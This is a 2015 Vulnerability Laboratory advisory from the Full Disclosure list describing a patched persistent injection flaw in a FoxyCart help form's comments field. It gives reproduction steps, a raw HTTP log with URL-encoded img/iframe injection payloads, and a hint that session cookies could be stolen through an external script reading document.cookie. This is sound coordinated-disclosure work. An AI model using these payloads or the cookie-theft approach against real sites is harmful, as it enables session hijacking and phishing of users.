Document Title:
===============
FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1451

098bdc9b309783df65044c5abb690dafdd4bcd436c380ae68c924fe37e14b4e0


Release Date:
=============
2015-07-15


Vulnerability Laboratory ID (VL-ID):
====================================
1451


Common Vulnerability Scoring System:
====================================
3.4


Product & Service Introduction:
===============================
Helping developers _add_ custom ecommerce without reinventing the wheel.

(Copy of the Homepage:  https://github.com/FoxyCart )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a filter bypass 
issue and an application-side input validation vulnerability in the official 
FoxyCart web-application.


Vulnerability Disclosure Timeline:
==================================
2015-03-05: Researcher Notification & Coordination (Benjamin Kunz Mejri - 
Evolution Security GmbH)
2015-04-01: Vendor Notification (FoxyCart - Security Research Team)
2015-04-09: Vendor Response/Feedback (FoxyCart - Security Research Team)
2015-06-30: Vendor Fix/Patch ( (FoxyCart - Developer Team)
2015-07-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
FoxyCart LLC
Product: FoxyCart - Web Application 2015 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation mail encoding vulnerability has been discovered 
in the official FoxyCart company web-application.
The issue allows remote attackers to inject own malicious web context to the 
application-side of a vulnerable module or function.

The security vulnerability is located in the `comments` input field value of 
the `landing/white-glove-onboarding > Help Form` module. 
Remote attackers can exploit the issue to execute persistent malicious context 
in foxycart service mails.

The injection takes place in the help contact form POST method request with the 
vulnerable comments input value. The execution of the 
script code occurs on the application-side in the email body context. Attackers 
are able to inject iframes, img sources with onload alert 
or other script code tags. The service does not encode the input and has also 
no input restriction. 

After the code has been saved during the registration the internal service 
takes the wrong encoded dbms entries and stream them back in a 
notification mail to the registered users inbox. The attacker is also able to 
include random email adresses to stream mails with malicious 
persistent context to random targets for phishing, spam and co. The code does 
not execute in the profile values that introduces to the 
manufacturer itself but in the attached comments value that becomes visible in 
the copy mail.

The security risk of the persistent input validation web vulnerability in the 
mail encoding of the web-server is estimated as medium with a cvss 
(common vulnerability scoring system) count of 3.4. If the issue is existing in 
the main service values the other services can be affected by the 
issue too. Exploitation of the mail encoding and web-server validation 
vulnerability requires low or medium user interaction and no privileged 
customer application user account. Successful exploitation of the persistent 
mail encoding web vulnerability results in session hijacking, persistent 
phishing attacks, persistent redirects to external malicious source and 
persistent manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] landing/white-glove-onboarding > Help Form

Vulnerable Parameter(s):
                                [+] comments

Affected Module(s):
                                [+] We`ve received your email


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote 
attackers without privileged application user account and with low or medium 
user interaction.
For security demonstration or to reproduce the security vulnerability follow 
the provided information and steps below to continue.

Manual steps to reproduce ...
1. Open the foxcart service
2. Surf to the vulnerable conatct form url
3. Inject random value to the inputs and inject to the comments your script 
code payload
4. Save the entry
5. Redirect via Refresh Referer to confirm the contact request
6. Check inbox of the contact mail input
7. The code executes in the comments body section
8. Successful reproduce of the vulnerability! 



--- PoC Session Logs [POST] (Inject) ---
13:33:03.031[1210ms][total 1210ms] Status: 302[Found]
POST http://www.foxycart.com/landing/white-glove-onboarding Load 
Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[0] Mime 
Type[text/html]
   Request Header:
      Host[www.foxycart.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 
Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.foxycart.com/landing/white-glove-onboarding]
      
Cookie[optimizelySegments=%7B%22234696064%22%3A%22ff%22%2C%22234587425%22%3A%22false%22%2C%22234346863%22%3A%22referral%22%7D;
 optimizelyEndUserId=oeu1425557285423r0.7588310203460514; 
optimizelyBuckets=%7B%22630610022%22%3A%22637250003%22%7D; 
__utma=91412365.670830544.1425557288.1425557288.1425557288.1; 
__utmb=91412365.49.9.1425557973207; __utmc=91412365; 
__utmz=91412365.1425557288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
wcsid=bVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; hblid=cXd4qSmViFwp1L9N575fV3P3JONRArB8; 
_oklv=1425558756967%2CbVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; 
ajs_user_id=%22bkm%40evolution-sec.com%22; ajs_group_id=null; 
ajs_anonymous_id=%22f9f4d6e9-ba8f-4231-b4e5-fb1e4dd21d01%22; 
__ar_v4=M2MP7NP4NRDZJKE5JJ255A%3A20150304%3A14%7CMZASOLFIIFHM7D4UXSZSHG%3A20150304%3A14%7CZ5SPRZQMMBAYPLL3Z7BEBR%3A20150304%3A14;
 kvcd=1425558696901; km_ai=bkm%40evolution-sec.com; km_uq=; km_vs=1; 
km_lv=1425558697; olfsk=olfsk9501150073115311; 
_okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1425557290132%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C;
 _ok=2799-934-10-5695; 
__utmv=91412365.|1=user_type=programmer%20developer%20merchant=1^2=trial=0.1=1; 
km_ni=bkm%40evolution-sec.com; optimizelyPendingLogEvents=%5B%5D]
      Connection[keep-alive]
   POST-Daten:
      
firstName[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      
lastName[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      email[bkm%40evolution-sec.com]
      phone[235235235]
      
field-0[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      
field-3[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      
field-4[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      id[840b20b9386a4e669f20873f092ae257]
   Response Header:
      Content-Type[text/html]
      Expires[Thu, 05 Mar 15 04:34:12 -0800]
      Cache-Control[max-age=60]
      Vary[Accept-Encoding]
      
Location[http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted]
      Content-Length[0]
      Accept-Ranges[bytes]
      Date[Thu, 05 Mar 2015 12:33:13 GMT]
      Connection[keep-alive]
      X-Frame-Options[SAMEORIGIN]


-
-
13:33:04.242[1255ms][total 1728ms] Status: 200[OK]
GET http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted 
Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe 
des Inhalts[7726] Mime Type[text/html]
   Request Header:
      Host[www.foxycart.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 
Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.foxycart.com/landing/white-glove-onboarding]
      
Cookie[optimizelySegments=%7B%22234696064%22%3A%22ff%22%2C%22234587425%22%3A%22false%22%2C%22234346863%22%3A%22referral%22%7D;
 optimizelyEndUserId=oeu1425557285423r0.7588310203460514; 
optimizelyBuckets=%7B%22630610022%22%3A%22637250003%22%7D; 
__utma=91412365.670830544.1425557288.1425557288.1425557288.1; 
__utmb=91412365.49.9.1425557973207; __utmc=91412365; 
__utmz=91412365.1425557288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
wcsid=bVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; hblid=cXd4qSmViFwp1L9N575fV3P3JONRArB8; 
_oklv=1425558756967%2CbVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; 
ajs_user_id=%22bkm%40evolution-sec.com%22; ajs_group_id=null; 
ajs_anonymous_id=%22f9f4d6e9-ba8f-4231-b4e5-fb1e4dd21d01%22; 
__ar_v4=M2MP7NP4NRDZJKE5JJ255A%3A20150304%3A14%7CMZASOLFIIFHM7D4UXSZSHG%3A20150304%3A14%7CZ5SPRZQMMBAYPLL3Z7BEBR%3A20150304%3A14;
 kvcd=1425558696901; km_ai=bkm%40evolution-sec.com; km_uq=; km_vs=1; 
km_lv=1425558697; olfsk=olfsk9501150073115311; 
_okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1425557290132%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C;
 _ok=2799-934-10-5695; 
__utmv=91412365.|1=user_type=programmer%20developer%20merchant=1^2=trial=0.1=1; 
km_ni=bkm%40evolution-sec.com; optimizelyPendingLogEvents=%5B%5D]
      Connection[keep-alive]
   Response Header:
      Content-Type[text/html]
      Expires[Thu, 05 Mar 15 04:34:13 -0800]
      Cache-Control[max-age=60]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Content-Length[7726]
      Accept-Ranges[bytes]
      Date[Thu, 05 Mar 2015 12:33:14 GMT]
      Connection[keep-alive]
      X-Frame-Options[SAMEORIGIN]



Note: Inject an img or iframe with an external js source that requests session 
data by usage of document.cookie to exploit

Reference(s):
http://www.foxycart.com/landing/white-glove-onboarding
http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure filter mechanism next to the help 
comment support form.
Restrict the input and encode the output message with the delivered copy.


Security Risk:
==============
The security risk of the filter issue and application-side input validation 
vulnerability is estimated as medium. (CVSS 3.4)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                        - www.evolution-sec.com
Contact:    ad...@vulnerability-lab.com         - 
resea...@vulnerability-lab.com                        - ad...@evolution-sec.com
Section:    magazine.vulnerability-db.com       - 
vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
                        - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To 
record, list (feed), modify, use or edit our material contact 
(ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a 
permission.

                                Copyright © 2015 | Vulnerability Laboratory - 
[Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com
PGP KEY: 
http://www.vulnerability-lab.com/keys/ad...@vulnerability-lab.com%280x198E9928%29.txt




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to